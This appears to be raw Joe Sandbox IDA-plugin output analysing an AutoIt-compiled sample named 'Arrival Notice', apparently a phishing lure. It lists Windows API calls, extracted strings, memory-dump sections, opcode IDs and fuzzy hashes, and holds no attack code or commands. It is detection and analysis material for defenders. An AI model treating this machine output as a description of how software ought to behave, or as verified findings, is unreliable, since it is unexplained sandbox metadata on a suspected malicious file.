                                              • Instruction Fuzzy Hash: 16318D71210604AAEB10DF69CC90BFB77BDFF88721F508A19F9A5C7190DA31AC95DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00932E00
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00932E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 3cd25ac0aad85ed16b987c4869cf10a3b07640d2590d2cc1ff8aecbd4a295dde
                                              • Instruction ID: 970e71f70e5052ff2bd37142bf204db9dc936f0c2fc1f8dfc25098eeb418c538
                                              • Opcode Fuzzy Hash: 3cd25ac0aad85ed16b987c4869cf10a3b07640d2590d2cc1ff8aecbd4a295dde
                                              • Instruction Fuzzy Hash: DB31E631604309EBEB34CF58D846BAEBBBDFF45350F14042AE995E61A0E7749940CF51
                                              APIs
                                              • __snwprintf.LIBCMT ref: 00943D5A
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __snwprintf_memmove
                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                              • API String ID: 3506404897-2584243854
                                              • Opcode ID: 073512f4a0b5587660b6d64e8f392473020a2c28578d8c3e26b041c1c29baebd
                                              • Instruction ID: 8d4a3f8a926ff8498c66c948a18f0053dfa002a72bc2124d6f07e3ec3a21974a
                                              • Opcode Fuzzy Hash: 073512f4a0b5587660b6d64e8f392473020a2c28578d8c3e26b041c1c29baebd
                                              • Instruction Fuzzy Hash: 69215371A00219ABCF14EF68CC81FAD77A5FF94714F444595F405E7281EB34EA45CBA2
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009569D0
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009569DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: d754452f6bd9f58746caab25234981be885daa6effa0a71bf431f2ac499bf8f0
                                              • Instruction ID: bc95859719afc3e439746260e4795f8388d7b2aa4e4f14c4b6f343b28314ea71
                                              • Opcode Fuzzy Hash: d754452f6bd9f58746caab25234981be885daa6effa0a71bf431f2ac499bf8f0
                                              • Instruction Fuzzy Hash: C911E2712002086FEF11DF29CCA0EAB376EEB893A5F500125FD5897290D6319C5587A0
                                              APIs
                                                • Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
                                                • Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
                                                • Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91
                                              • GetWindowRect.USER32(00000000,?), ref: 00956EE0
                                              • GetSysColor.USER32(00000012), ref: 00956EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 3e3d094274cafbf68da204c23156a7515122066a4d0075cb8d44bfe1f0307575
                                              • Instruction ID: 5edfa7d760ccc140129fabe42328147d42e1ea5c5f2b986c9587a8f23c52e240
                                              • Opcode Fuzzy Hash: 3e3d094274cafbf68da204c23156a7515122066a4d0075cb8d44bfe1f0307575
                                              • Instruction Fuzzy Hash: 0A215972A20209AFDF04DFA9CD45AFA7BB8FB08315F044629FD55D3250E734E8659B50
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00956C11
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00956C20
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: fe1da73ba937cb233a278f7da8836a57ac3fc5254ef9052d46b7eec46c4c06a2
                                              • Instruction ID: 963f336128aa6f40f84ca6a71e51c579438b46e170c8bc0acf60ebad0ddfc638
                                              • Opcode Fuzzy Hash: fe1da73ba937cb233a278f7da8836a57ac3fc5254ef9052d46b7eec46c4c06a2
                                              • Instruction Fuzzy Hash: B1119D71105208ABEF108E65DC41ABB376DEB4437AF904724FEA0D71E0C735EC99A760
                                              APIs
                                              • _memset.LIBCMT ref: 00932F11
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00932F30
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: c0497647065d15a94f7e5e893b3049e83399340784f3a0ee6fef6b70534be4d9
                                              • Instruction ID: 584e98762585e5163e780864cd5d3de32f596a1def4fe8157f98d26f65a556e7
                                              • Opcode Fuzzy Hash: c0497647065d15a94f7e5e893b3049e83399340784f3a0ee6fef6b70534be4d9
                                              • Instruction Fuzzy Hash: 4A11EF32915228ABCB20DF5DDC45BAA73BDEB05350F0800A2E944AB2A0D7B0EE04CF91
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00942520
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00942549
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 8c19d645ed4071586db50a43fcae1d4646fcfdf15be39471c64c4be4be0a70a5
                                              • Instruction ID: 0545f3ff47917798ff7909409b367131ae73dd72d74cb75d98cb02cc83a6ed47
                                              • Opcode Fuzzy Hash: 8c19d645ed4071586db50a43fcae1d4646fcfdf15be39471c64c4be4be0a70a5
                                              • Instruction Fuzzy Hash: 2511CEB0601225BADB249F628C99EBBFFACFF06765F50812AF90547140D2B46981DBF0
                                              APIs
                                                • Part of subcall function 0094830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,009480C8,?,00000000,?,?), ref: 00948322
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
                                              • htons.WSOCK32(00000000,?,00000000), ref: 00948108
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: a7b417bcce42cbe6dec7ff20cb9a998fed83079c5fb2cbe1614b091edf6c8bf5
                                              • Instruction ID: 77d721b0b6140bc6f6a72d44cedac2c3806a7994ab4ee22986e176c5aa93ee6c
                                              • Opcode Fuzzy Hash: a7b417bcce42cbe6dec7ff20cb9a998fed83079c5fb2cbe1614b091edf6c8bf5
                                              • Instruction Fuzzy Hash: 5811E134204315ABDB20AF64CC46FFEB374FF48320F108627EA1197291DB72A801C795
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00929355
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 85421f5ef8c8f6da53ded5d0ca38c873cd19739fbc6ddf33d72ef8bd23f3b5e2
                                              • Instruction ID: 70e8b66d5859eb8edc93bd502d8b9a9eda559996b6ed9cf05463f3b3fbce777e
                                              • Opcode Fuzzy Hash: 85421f5ef8c8f6da53ded5d0ca38c873cd19739fbc6ddf33d72ef8bd23f3b5e2
                                              • Instruction Fuzzy Hash: F801D271A45224AB8B04EB64CC919FE73A9FF46320F14071AF832973D5DB3158088751
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0092924D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 27956885180476ef610eed7dd3408ef88e8575347100e5d49a62e74ba400b812
                                              • Instruction ID: 9d2dec4d3a30373e916e36b4dd9dd3b0554678679891507972658e05f7d1d726
                                              • Opcode Fuzzy Hash: 27956885180476ef610eed7dd3408ef88e8575347100e5d49a62e74ba400b812
                                              • Instruction Fuzzy Hash: DB01A771A41229BBCB19EBA4D992EFF73ACEF45300F14011AB912A7385EE155F0C9672
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 009292D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 372448540-1403004172
                                              • Opcode ID: 49b543d439fc1db811a79c667c995634192eefe9ad73b52e5547d5d0db36b8cc
                                              • Instruction ID: 00c925ab828ce528732a40b5914afc989610b15927147081fb6d9a9cfe2c57fe
                                              • Opcode Fuzzy Hash: 49b543d439fc1db811a79c667c995634192eefe9ad73b52e5547d5d0db36b8cc
                                              • Instruction Fuzzy Hash: CE01DB71A41129BBCB15F7A4D982EFF77ACEF11300F2401167812B3385DA155F0C9272
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp
                                              • String ID: #32770
                                              • API String ID: 2292705959-463685578
                                              • Opcode ID: a6409c16e708413ab8a8695bcf5506fc047be029fe5fbf337673c567853bee3d
                                              • Instruction ID: f16886632beba5ca38535d41774f72b1d745b1f9b7334211f5dbeb9ab4e54635
                                              • Opcode Fuzzy Hash: a6409c16e708413ab8a8695bcf5506fc047be029fe5fbf337673c567853bee3d
                                              • Instruction Fuzzy Hash: CFE06832A0432C2BE320AAA9AC09FA7F7ACFB45731F01006BFD20D3040E5609A448BE1
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009281CA
                                                • Part of subcall function 008F3598: _doexit.LIBCMT ref: 008F35A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Message_doexit
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 1993061046-4017498283
                                              • Opcode ID: 84979de4cb037e32dd153df2295cb313443d3a576e5f9b4452dd2ea1c8b515ee
                                              • Instruction ID: 4d3136990a6419524a47071e204eb867983ff5b05d85df88e2ded27ab2500383
                                              • Opcode Fuzzy Hash: 84979de4cb037e32dd153df2295cb313443d3a576e5f9b4452dd2ea1c8b515ee
                                              • Instruction Fuzzy Hash: A7D05B323C672C32D21432BD6C0BFDA76489B55B56F044016FB08D55D38DD5599153DA
                                              APIs
                                                • Part of subcall function 0090B564: _memset.LIBCMT ref: 0090B571
                                                • Part of subcall function 008F0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0090B540,?,?,?,008D100A), ref: 008F0B89
                                              • IsDebuggerPresent.KERNEL32(?,?,?,008D100A), ref: 0090B544
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008D100A), ref: 0090B553
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0090B54E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 3158253471-631824599
                                              • Opcode ID: da9ba24fdac47746fe095abe0ad5c8ffd7ab6ec01f5c8b61791ab115cf7f80f6
                                              • Instruction ID: 77ba2ab8ae57e57134ff3d9313f73e678687964873c5250856590428173a2fbb
                                              • Opcode Fuzzy Hash: da9ba24fdac47746fe095abe0ad5c8ffd7ab6ec01f5c8b61791ab115cf7f80f6
                                              • Instruction Fuzzy Hash: 06E06DB02147118FD720DF29D8047467BE4AF00755F00896DF456C3791E7B4D408CB61
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00955BF5
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00955C08
                                                • Part of subcall function 009354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: c69e9f36f3ab309c762895e714999fc5ee136c17118e87f31b25a086676329a3
                                              • Instruction ID: 9dc280995aa2b0834ea28c11cc717bcf8f28f976c1b808aa94b39cde71cbfe89
                                              • Opcode Fuzzy Hash: c69e9f36f3ab309c762895e714999fc5ee136c17118e87f31b25a086676329a3
                                              • Instruction Fuzzy Hash: 88D0C9313AC311B7E768BB71AC5FFA76A14AB44B62F050825B745AA1E0D9E45801D750